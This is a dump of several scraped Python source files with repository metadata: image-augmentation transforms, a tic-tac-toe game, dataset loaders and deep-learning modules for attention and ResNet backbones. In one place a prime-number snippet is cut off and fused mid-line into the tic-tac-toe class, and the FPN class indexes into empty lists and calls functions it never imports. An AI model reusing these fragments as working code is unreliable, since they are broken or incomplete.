0.5),\n clip_first_on_zero=False)\n\n @torch.jit.unused\n def _check_input(self, value, name, center=1, bound=(0, float('inf')), clip_first_on_zero=True):\n if isinstance(value, numbers.Number):\n if value < 0:\n raise ValueError(\"If {} is a single number, it must be non negative.\".format(name))\n value = [center - float(value), center + float(value)]\n if clip_first_on_zero:\n value[0] = max(value[0], 0.0)\n elif isinstance(value, (tuple, list)) and len(value) == 2:\n if not bound[0] <= value[0] <= value[1] <= bound[1]:\n raise ValueError(\"{} values should be between {}\".format(name, bound))\n else:\n raise TypeError(\"{} should be a single number or a list/tuple with length 2.\".format(name))\n\n # if value is 0 or (1., 1.) for brightness/contrast/saturation\n # or (0., 0.) for hue, do nothing\n if value[0] == value[1] == center:\n value = None\n return value\n\n @staticmethod\n def get_params(brightness, contrast, saturation, hue):\n fn_idx = torch.randperm(4)\n\n b = None if brightness is None else float(torch.empty(1).uniform_(brightness[0], brightness[1]))\n c = None if contrast is None else float(torch.empty(1).uniform_(contrast[0], contrast[1]))\n s = None if saturation is None else float(torch.empty(1).uniform_(saturation[0], saturation[1]))\n h = None if hue is None else float(torch.empty(1).uniform_(hue[0], hue[1]))\n\n return fn_idx, b, c, s, h\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Input image.\n\n Returns:\n PIL Image or Tensor: Color jittered image.\n \"\"\"\n fn_idx, brightness_factor, contrast_factor, saturation_factor, hue_factor = \\\n self.get_params(self.brightness, self.contrast, self.saturation, self.hue)\n\n for fn_id in fn_idx:\n if fn_id == 0 and brightness_factor is not None:\n images = [F.adjust_brightness(img, brightness_factor) for img in images]\n elif fn_id == 1 and contrast_factor is not None:\n images = [F.adjust_contrast(img, contrast_factor) for img in images]\n elif fn_id == 2 and saturation_factor is not None:\n images = [F.adjust_saturation(img, saturation_factor) for img in images]\n elif fn_id == 3 and hue_factor is not None:\n images = [F.adjust_hue(img, hue_factor) for img in images]\n\n return images\n\n\nclass GroupGaussianBlur(torch.nn.Module):\n def __init__(self, kernel_size, sigma=(0.1, 2.0)):\n super().__init__()\n self.kernel_size = kernel_size\n self.sigma = sigma\n\n @staticmethod\n def get_params(sigma_min, sigma_max):\n return torch.empty(1).uniform_(sigma_min, sigma_max).item()\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): image to be blurred.\n\n Returns:\n PIL Image or Tensor: Gaussian blurred image\n \"\"\"\n sigma = self.get_params(self.sigma[0], self.sigma[1])\n return [F.gaussian_blur(img, self.kernel_size, [sigma, sigma]) for img in images]\n\n\nclass GroupToTensor(torch.nn.Module):\n def __call__(self, images):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return [F.to_tensor(img) for img in images]\n\n\nclass GroupNormalize(torch.nn.Module):\n def __init__(self, mean, std, inplace=False):\n super().__init__()\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def forward(self, tensors):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n return torch.stack([F.normalize(tensor, self.mean, self.std, self.inplace) for tensor in tensors])\n\n\nclass GroupRandomErasing(torch.nn.Module):\n def __init__(self, p=0.5, scale=(0.02, 0.33), ratio=(0.3, 3.3), value=0, inplace=False):\n super().__init__()\n self.p = p\n self.scale = scale\n self.ratio = ratio\n self.value = value\n self.inplace = inplace\n\n @staticmethod\n def get_params(img, scale, ratio, value=None):\n img_c, img_h, img_w = img.size()\n area = img_h * img_w\n\n log_ratio = torch.log(torch.tensor(ratio))\n for _ in range(10):\n erase_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(log_ratio[0], log_ratio[1])\n ).item()\n\n h = int(round(math.sqrt(erase_area * aspect_ratio)))\n w = int(round(math.sqrt(erase_area / aspect_ratio)))\n if not (h < img_h and w < img_w):\n continue\n\n if value is None:\n v = torch.empty([img_c, h, w], dtype=torch.float32).normal_()\n else:\n v = torch.tensor(value)[:, None, None]\n\n i = torch.randint(0, img_h - h + 1, size=(1,)).item()\n j = torch.randint(0, img_w - w + 1, size=(1,)).item()\n return i, j, h, w, v\n\n # Return original image\n return 0, 0, img_h, img_w, img\n\n def forward(self, images):\n \"\"\"\n Args:\n img (Tensor): Tensor image to be erased.\n\n Returns:\n img (Tensor): Erased Tensor image.\n \"\"\"\n if torch.rand(1) < self.p:\n\n # cast self.value to script acceptable type\n if isinstance(self.value, (int, float)):\n value = [self.value, ]\n elif isinstance(self.value, str):\n value = None\n elif isinstance(self.value, tuple):\n value = list(self.value)\n else:\n value = self.value\n\n x, y, h, w, v = self.get_params(images[0], scale=self.scale, ratio=self.ratio, value=value)\n if x == 0 and y == 0:\n return images\n else:\n return [F.erase(img, x, y, h, w, v, self.inplace) for img in images]\n return images\n\n\nclass GroupCenterCrop(torch.nn.Module):\n def __init__(self, size):\n super().__init__()\n self.size = size\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n PIL Image or Tensor: Cropped image.\n \"\"\"\n return [F.center_crop(img, self.size) for img in images]\n\n\nclass GroupResize(torch.nn.Module):\n def __init__(self, size):\n super().__init__()\n self.size = size\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be scaled.\n\n Returns:\n PIL Image or Tensor: Rescaled image.\n \"\"\"\n return [F.resize(img, self.size) for img in images]\n\n\nclass GroupConvertImageDtype(torch.nn.Module):\n def __init__(self, dtype):\n super().__init__()\n self.dtype = dtype\n\n def __call__(self, images):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return [F.convert_image_dtype(img, self.dtype) for img in images]\n\n\ndef _setup_angle(x, name, req_sizes=(2,)):\n if isinstance(x, numbers.Number):\n if x < 0:\n raise ValueError(\"If {} is a single number, it must be positive.\".format(name))\n x = [-x, x]\n\n return [float(d) for d in x]\n","repo_name":"trigger26/SPSVR","sub_path":"transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":12058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9613587849","text":"#!/usr/bin/env pypy3\n# -*- coding: UTF-8 -*-\ndef prime_t(t):\n i=2\n while i**2<=t:\n if t%i==0:\n return 0\n i+=1\n return 1\np=[]\n\nfor i in range(2,1008):\n if prime_t(i):\n p.append(i)\nd={i:0 for i in p}\nmod=10**9+7\nn=int(input())\ntmp=1\nans=1\nR=[i for i in range(168)]\nfor i in range(1,n+1):\n tmp*=i\n for j in R:\n while tmp%p[j]==0:\n d[p[j]]+=1\n tmp//=p[j]\n if tmp= self.boarddims[0] * self.boarddims[1]) :\n print('Invalid spot, chose another')\n continue\n spot = self.spotToXY(spot)\n if (self.board[spot[0], spot[1]] > 0):\n print('Spot taken, chose another')\n continue\n valid = True\n return spot\n \n def showBoard(self) :\n index = 0\n for row in range(self.boarddims[0]) :\n for col in range(self.boarddims[1]) :\n position_entry = index if self.board[row,col] == 0 else ('X' if self.board[row,col] == 1 else 'Y') \n print(' {} '.format(position_entry), end='')\n index = index + 1\n print('\\n')\n \n def checkWinner(self) :\n winner = 0\n \n # check cols\n for i in range(self.boarddims[0]) :\n if np.all(self.board[:,i] == 1) :\n return 1\n if np.all(self.board[:,i] == 2) :\n return 2\n # check rows\n for i in range(self.boarddims[1]) :\n if np.all(self.board[i,:] == 1) :\n return 1\n if np.all(self.board[i,:] == 2) :\n return 2\n # check diags\n if np.all(self.board.diagonal() == 1) :\n return 1\n if np.all(self.board.diagonal() == 2) :\n return 2\n \n reverse_diag = np.array([self.board[i,self.boarddims[1]-1-i] for i in range(self.boarddims[0])]) \n if np.all(reverse_diag == 1) :\n return 1\n if np.all(reverse_diag == 2) :\n return 2\n \n maxed_out = not (self.board==0).any()\n if (maxed_out and winner == 0) :\n winner = -1\n \n return winner\n\n'''\n 0 1 2 \n\n 3 4 5 \n\n 6 7 8 \n'''\n \n#%% Test game\nplaying = True\nwhile playing == True :\n game = tictactoe(2, 3)\n game.play()\n \n valid = False\n while valid == False :\n try : \n playing = bool(int(input('Play again? (0 for no, anything other # for yes) ')))\n if playing == False :\n print('Goodbye!')\n break\n except : \n valid = False\n valid = True\n","repo_name":"starstorms9/Insight-CS-Practicals","sub_path":"tictac/Tyler_Habowski_TicTacToe_V1.py","file_name":"Tyler_Habowski_TicTacToe_V1.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28188777506","text":"\"\"\"\nUtilities for data.\n\"\"\"\n\nimport numpy as np\nimport torch\nimport torchvision\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom torchvision import transforms, datasets\n\nfrom utils import toy_data\nfrom .toy_data import TOY_DSETS\nfrom tabular import TAB_DSETS\n\n\ndef logit(x, alpha=0.):\n x = x * (1. - 2 * alpha) + alpha\n return torch.log(x) - torch.log(1. - x)\n\n\ndef get_data(args):\n \"\"\"\n Get data.\n \"\"\"\n if args.unit_interval:\n post_trans = [lambda x: x]\n post_trans_inv = lambda x: x\n elif args.logit:\n post_trans = [lambda x: (x + (torch.rand_like(x) - 0.5) / 256).clamp(1e-3, 1-1e-3), logit]\n post_trans_inv = lambda x: x.sigmoid()\n else:\n post_trans = [lambda x: 2 * x - 1]\n post_trans_inv = lambda x: (x + 1) / 2\n if args.dataset in TOY_DSETS:\n data = torch.from_numpy(toy_data.inf_train_gen(args.dataset, batch_size=args.batch_size)).float()\n dset = TensorDataset(data, data) # add data as \"labels\" to match api for image dsets\n dload = DataLoader(dset, args.batch_size, True, drop_last=True)\n\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(x, p, normalize=False, nrow=sqrt(x.size(0)))\n return dload, dload, plot\n elif args.dataset in TAB_DSETS:\n dset = TAB_DSETS[args.dataset](seed=args.seed)\n\n tr_dataset = TensorDataset(torch.tensor(dset.trn.x), torch.tensor(dset.trn.y))\n te_dataset = TensorDataset(torch.tensor(dset.val.x), torch.tensor(dset.val.y))\n\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n\n return tr_dload, te_dload, None\n elif args.dataset == \"mnist\":\n if args.img_size is not None:\n pre_trans = [transforms.Resize(args.img_size),\n transforms.ToTensor()]\n else:\n pre_trans = [transforms.ToTensor()]\n post_trans += [lambda x: x.view(-1)]\n\n tr_dataset = datasets.MNIST(\"./data\",\n transform=transforms.Compose(pre_trans +\n post_trans),\n download=True)\n te_dataset = datasets.MNIST(\"./data\", train=False,\n transform=transforms.Compose(pre_trans + post_trans),\n download=True)\n\n\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: \\\n torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n\n return tr_dload, te_dload, plot\n elif args.dataset == \"stackmnist\":\n if args.img_size is not None:\n pre_trans = [transforms.Resize(args.img_size), transforms.ToTensor()]\n else:\n pre_trans = [transforms.ToTensor()]\n post_trans += [lambda x: x.view(-1)]\n tr_dataset = datasets.MNIST(\"./data\",\n transform=transforms.Compose(pre_trans +\n post_trans),\n download=True)\n\n def dataset_to_tensor(dataset):\n \"\"\"\n Convert dataset to tensor (in particular apply resizing transformations).\n \"\"\"\n loader = DataLoader(dataset, batch_size=len(dataset))\n return next(iter(loader))\n\n def stack_mnist(dataset):\n \"\"\"\n Stack 3 MNIST images along 3 channels.\n \"\"\"\n x, y = dataset_to_tensor(dataset)\n np.random.seed(args.seed) # seed so we always train on the same stackmnist\n ids = np.random.randint(0, x.shape[0], size=(x.shape[0], 3))\n X_training = torch.zeros(x.shape[0], 3, x.shape[2], x.shape[3])\n Y_training = torch.zeros(x.shape[0])\n for i in range(ids.shape[0]):\n cnt = 0\n for j in range(ids.shape[1]):\n xij = x[ids[i, j]]\n X_training[i, j] = xij\n cnt += y[ids[i, j]] * (10**j)\n Y_training[i] = cnt\n if i % 10000 == 0:\n print('i: {}/{}'.format(i, ids.shape[0]))\n\n return TensorDataset(X_training, Y_training)\n\n tr_dataset = stack_mnist(tr_dataset)\n\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n\n def plot(p, x):\n \"\"\"\n Unstack images for plotting.\n \"\"\"\n x = torch.cat((x[:, 0], x[:, 1], x[:, 2]), dim=0)[:, None]\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n return torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n\n return tr_dload, None, plot\n\n elif args.dataset == \"svhn\":\n if args.data_aug:\n augs = [transforms.Pad(4, padding_mode=\"reflect\"), transforms.RandomCrop(32)]\n print(\"using data augmentation\")\n else:\n augs = []\n tr_dataset = datasets.SVHN(\"./data\",\n transform=transforms.Compose(augs +\n [transforms.ToTensor()] +\n post_trans),\n download=True)\n te_dataset = datasets.SVHN(\"./data\", split='test',\n transform=transforms.Compose([transforms.ToTensor()] +\n post_trans),\n download=True)\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n return tr_dload, te_dload, plot\n\n elif args.dataset == \"cifar10\":\n if args.data_aug:\n augs = [transforms.Pad(4, padding_mode=\"reflect\"),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip()]\n print(\"using data augmentation\")\n else:\n augs = []\n tr_dataset = datasets.CIFAR10(\"./data\",\n transform=transforms.Compose(augs +\n [transforms.ToTensor()] +\n post_trans),\n download=True)\n te_dataset = datasets.CIFAR10(\"./data\", train=False,\n transform=transforms.Compose([transforms.ToTensor()] +\n post_trans),\n download=True)\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n return tr_dload, te_dload, plot\n\n elif args.dataset == \"cifar100\":\n if args.data_aug:\n augs = [transforms.Pad(4, padding_mode=\"reflect\"),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip()]\n print(\"using data augmentation\")\n else:\n augs = []\n tr_dataset = datasets.CIFAR100(\"./data\",\n transform=transforms.Compose(augs +\n [transforms.ToTensor()] +\n post_trans),\n download=True)\n te_dataset = datasets.CIFAR100(\"./data\", train=False,\n transform=transforms.Compose([transforms.ToTensor()] +\n post_trans),\n download=True)\n tr_dload = DataLoader(tr_dataset, args.batch_size, True, drop_last=True)\n te_dload = DataLoader(te_dataset, args.batch_size, False)\n sqrt = lambda x: int(torch.sqrt(torch.Tensor([x])))\n plot = lambda p, x: torchvision.utils.save_image(post_trans_inv(x), p, normalize=False, nrow=sqrt(x.size(0)))\n return tr_dload, te_dload, plot\n\n else:\n raise NotImplementedError\n","repo_name":"wgrathwohl/VERA","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8938,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"52"} +{"seq_id":"75310849443","text":"\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom torchvision import datasets, transforms\nimport torchvision\nfrom torch.utils.data import Dataset, DataLoader\nimport os\nimport torch.nn as nn\nimport torch\nfrom torchinfo import summary\nfrom dataclasses import dataclass\nfrom torch.nn import functional as F\nfrom PIL import Image\nfrom torchvision import models\n\n\nclass ResNet_with_FPN(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.d = config.d\n self.resnet = resnet18()\n self.pyramid = []\n self.return_nodes = {\n 'layer1.1.conv2': 'layer1', #P2\n 'layer2.1.conv2': 'layer2', #P3\n 'layer3.1.conv2': 'layer3', #P4\n 'layer4.1.conv2': 'layer4' #P5\n }\n self.feature_extractor = create_feature_extractor(self.resnet, return_nodes=self.return_nodes)\n self.conv1_list = nn.ModuleList([\n nn.Conv2d(64, 1, (1,1), 1),\n nn.Conv2d(128, 1, (1,1), 1),\n nn.Conv2d(256, 1, (1,1), 1),\n nn.Conv2d(512, 1, (1,1), 1),\n ])\n self.conv3_list = nn.ModuleList([nn.Conv2d(1, self.d, (3,3), 2) for _ in range(4)])\n \n def forward(self, x):\n B, C, H, W = x.shape\n intermediate_outputs = self.feature_extractor(x)\n pyramid = []\n outs = []\n for i in range(3, -1, -1):\n layer_name = 'layer'+str(i)\n conv1 = self.conv1_list[i]\n conv3 = self.conv3_list[i]\n pyramid[i] = conv1(intermediate_outputs[layer_name])\n if i<3:\n pyramid[i] += F.interpolate(pyramid[i+1], scale_factor=(2,2))\n outs[i] = conv3(pyramid[i])\n return outs\n\nclass MultiAspectGCAttention(nn.Module):\n\n def __init__(self,\n inplanes,\n ratio=0.065,\n headers=1,\n pooling_type='att',\n att_scale=False,\n fusion_type='channel_concat'):\n super().__init__()\n assert pooling_type in ['avg', 'att']\n\n assert fusion_type in ['channel_add', 'channel_mul', 'channel_concat']\n assert inplanes % headers == 0 and inplanes >= 8 # inplanes must be divided by headers evenly\n\n self.headers = headers\n self.inplanes = inplanes\n self.ratio = ratio\n self.planes = int(inplanes * ratio)\n self.pooling_type = pooling_type\n self.fusion_type = fusion_type\n self.att_scale = False\n\n self.single_header_inplanes = int(inplanes / headers)\n\n if pooling_type == 'att':\n self.conv_mask = nn.Conv2d(self.single_header_inplanes, 1, kernel_size=1)\n self.softmax = nn.Softmax(dim=2)\n else:\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n\n if fusion_type == 'channel_add':\n self.channel_add_conv = nn.Sequential(\n nn.Conv2d(self.inplanes, self.planes, kernel_size=1),\n nn.LayerNorm([self.planes, 1, 1]),\n nn.ReLU(inplace=True),\n nn.Conv2d(self.planes, self.inplanes, kernel_size=1))\n elif fusion_type == 'channel_concat':\n self.channel_concat_conv = nn.Sequential(\n nn.Conv2d(self.inplanes, self.planes, kernel_size=1),\n nn.LayerNorm([self.planes, 1, 1]),\n nn.ReLU(inplace=True),\n nn.Conv2d(self.planes, self.inplanes, kernel_size=1))\n # for concat\n self.cat_conv = nn.Conv2d(2 * self.inplanes, self.inplanes, kernel_size=1)\n elif fusion_type == 'channel_mul':\n self.channel_mul_conv = nn.Sequential(\n nn.Conv2d(self.inplanes, self.planes, kernel_size=1),\n nn.LayerNorm([self.planes, 1, 1]),\n nn.ReLU(inplace=True),\n nn.Conv2d(self.planes, self.inplanes, kernel_size=1))\n\n def spatial_pool(self, x):\n batch, channel, height, width = x.size()\n if self.pooling_type == 'att':\n # [N*headers, C', H , W] C = headers * C'\n x = x.view(batch * self.headers, self.single_header_inplanes, height, width)\n input_x = x\n\n # [N*headers, C', H * W] C = headers * C'\n # input_x = input_x.view(batch, channel, height * width)\n input_x = input_x.view(batch * self.headers, self.single_header_inplanes, height * width)\n\n # [N*headers, 1, C', H * W]\n input_x = input_x.unsqueeze(1)\n # [N*headers, 1, H, W]\n context_mask = self.conv_mask(x)\n # [N*headers, 1, H * W]\n context_mask = context_mask.view(batch * self.headers, 1, height * width)\n\n # scale variance\n if self.att_scale and self.headers > 1:\n context_mask = context_mask / torch.sqrt(torch.tensor(self.single_header_inplanes))\n\n # [N*headers, 1, H * W]\n context_mask = self.softmax(context_mask)\n\n # [N*headers, 1, H * W, 1]\n context_mask = context_mask.unsqueeze(-1)\n # [N*headers, 1, C', 1] = [N*headers, 1, C', H * W] * [N*headers, 1, H * W, 1]\n context = torch.matmul(input_x, context_mask)\n\n # [N, headers * C', 1, 1]\n context = context.view(batch, self.headers * self.single_header_inplanes, 1, 1)\n else:\n # [N, C, 1, 1]\n context = self.avg_pool(x)\n\n return context\n\n def forward(self, x):\n # [N, C, 1, 1]\n context = self.spatial_pool(x)\n\n out = x\n\n if self.fusion_type == 'channel_mul':\n # [N, C, 1, 1]\n channel_mul_term = torch.sigmoid(self.channel_mul_conv(context))\n out = out * channel_mul_term\n elif self.fusion_type == 'channel_add':\n # [N, C, 1, 1]\n channel_add_term = self.channel_add_conv(context)\n out = out + channel_add_term\n else:\n # [N, C, 1, 1]\n channel_concat_term = self.channel_concat_conv(context)\n\n # use concat\n _, C1, _, _ = channel_concat_term.shape\n N, C2, H, W = out.shape\n\n out = torch.cat([out, channel_concat_term.expand(-1, -1, H, W)], dim=1)\n out = self.cat_conv(out)\n out = nn.functional.layer_norm(out, [self.inplanes, H, W])\n out = nn.functional.relu(out)\n\n return out\n\ndef conv3x3(in_planes, out_planes, stride=1):\n # \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, use_gcb=False, gcb_config=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes, momentum=0.9)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes, momentum=0.9)\n self.downsample = downsample\n self.stride = stride\n self.use_gcb = use_gcb\n\n if self.use_gcb:\n gcb_ratio = gcb_config['ratio']\n gcb_headers = gcb_config['headers']\n att_scale = gcb_config['att_scale']\n fusion_type = gcb_config['fusion_type']\n self.context_block = MultiAspectGCAttention(inplanes=planes,\n ratio=gcb_ratio,\n headers=gcb_headers,\n att_scale=att_scale,\n fusion_type=fusion_type)\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.use_gcb:\n out = self.context_block(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out = out + residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = conv1x1(inplanes, planes)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = conv3x3(planes, planes, stride)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = conv1x1(planes, planes * self.expansion)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out = out + identity\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, zero_init_residual=False, gcb=None, in_channels=1):\n super(ResNet, self).__init__()\n gcb_config = gcb\n\n self.inplanes = 64\n self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(32)\n self.relu1 = nn.ReLU(inplace=True)\n\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(64)\n self.relu2 = nn.ReLU(inplace=True)\n\n self.maxpool1 = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.layer1 = self._make_layer(block, 128, layers[0], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][0])\n\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn3 = nn.BatchNorm2d(128)\n self.relu3 = nn.ReLU(inplace=True)\n\n self.maxpool2 = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.layer2 = self._make_layer(block, 128, layers[1], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][1])\n\n self.conv4 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn4 = nn.BatchNorm2d(128)\n self.relu4 = nn.ReLU(inplace=True)\n\n self.maxpool3 = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))\n\n self.layer3 = self._make_layer(block, 256, layers[2], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][2])\n\n self.conv5 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn5 = nn.BatchNorm2d(256)\n self.relu5 = nn.ReLU(inplace=True)\n\n self.layer4 = self._make_layer(block, 256, layers[3], stride=1, gcb_config=gcb_config,\n use_gcb=gcb_config['layers'][3])\n\n self.conv6 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn6 = nn.BatchNorm2d(256)\n self.relu6 = nn.ReLU(inplace=True)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1, use_gcb=False, gcb_config=None):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, use_gcb=use_gcb, gcb_config=gcb_config))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu1(x)\n\n x = self.conv2(x)\n x = self.bn2(x)\n x = self.relu2(x)\n x = self.maxpool1(x)\n x = self.layer1(x)\n\n x = self.conv3(x)\n x = self.bn3(x)\n x = self.relu3(x)\n x = self.maxpool2(x)\n x = self.layer2(x)\n\n x = self.conv4(x)\n x = self.bn4(x)\n x = self.relu4(x)\n x = self.maxpool3(x)\n x = self.layer3(x)\n\n x = self.conv5(x)\n x = self.bn5(x)\n x = self.relu5(x)\n\n x = self.layer4(x)\n\n x = self.conv6(x)\n x = self.bn6(x)\n x = self.relu6(x)\n return x\n\n\ndef resnet50(gcb_kwargs, in_channels=1):\n model = ResNet(BasicBlock, [1, 2, 5, 3], gcb=gcb_kwargs, in_channels=in_channels)\n return model\n\n\nclass ConvEmbeddingGC(nn.Module):\n\n def __init__(self, in_channels=3):\n super().__init__()\n gcb_kwargs = {\n \"ratio\": 0.0625,\n \"headers\": 8,\n \"att_scale\": True,\n \"fusion_type\": \"channel_concat\",\n \"layers\":[False, True, True, True]\n }\n self.backbone = resnet50(gcb_kwargs, in_channels=in_channels)\n\n def forward(self, x):\n feature = self.backbone(x)\n b, c, h, w = feature.shape # (B, C, H/8, W/4)\n feature = feature.view(b, c, h * w)\n feature = feature.permute((0, 2, 1))\n return feature\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dropout = nn.Dropout(p=config.pe_dropout)\n\n position = torch.arange(config.pe_maxlen).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, config.n_embd, 2) * (-math.log(10000.0) / config.n_embd))\n self.pe = torch.zeros(config.pe_maxlen, 1, config.n_embd)\n self.pe[:, 0, 0::2] = torch.sin(position * div_term)\n self.pe[:, 0, 1::2] = torch.cos(position * div_term)\n\n def forward(self, x):\n \"\"\"\n Arguments:\n x: Tensor, shape ``[batch_size, seq_len, embedding_dim]``\n \"\"\"\n x = x + self.pe[:x.size(1)].transpose(0,1)\n return self.dropout(x)\n\nclass CrossAttention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.n_embd = config.n_embd\n self.n_heads = config.n_heads\n self.c_attn_q = nn.Linear(self.n_embd, self.n_embd, bias=config.bias) # q * Wq\n self.c_attn_kv = nn.Linear(self.n_embd, self.n_embd*2, bias=config.bias)# k,v * Wk,\n self.c_proj = nn.Linear(self.n_embd, self.n_embd, bias=config.bias)\n # self.mask = torch.tril(torch.ones((self.block_size, self.block_size))).view(1, 1, self.block_size, self.block_size)\n self.attn_dropout = nn.Dropout(config.dropout)\n self.resid_dropout = nn.Dropout(config.dropout)\n\n\n def forward(self, x, encoder_output):\n if x.shape[0] != encoder_output.shape[0]:\n print(\"error ca\")\n return\n assert x.shape[0] == encoder_output.shape[0]\n B, T, C = encoder_output.shape # batch_size, block_size, n_embd\n B, N, C = x.shape # batch_size, n_queries, n_embd\n\n k, v = self.c_attn_kv(encoder_output).split(self.n_embd, dim=2)\n q = self.c_attn_q(x)\n\n q = q.view(B, N, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, N, h_size)\n k = k.view(B, T, self.n_heads, 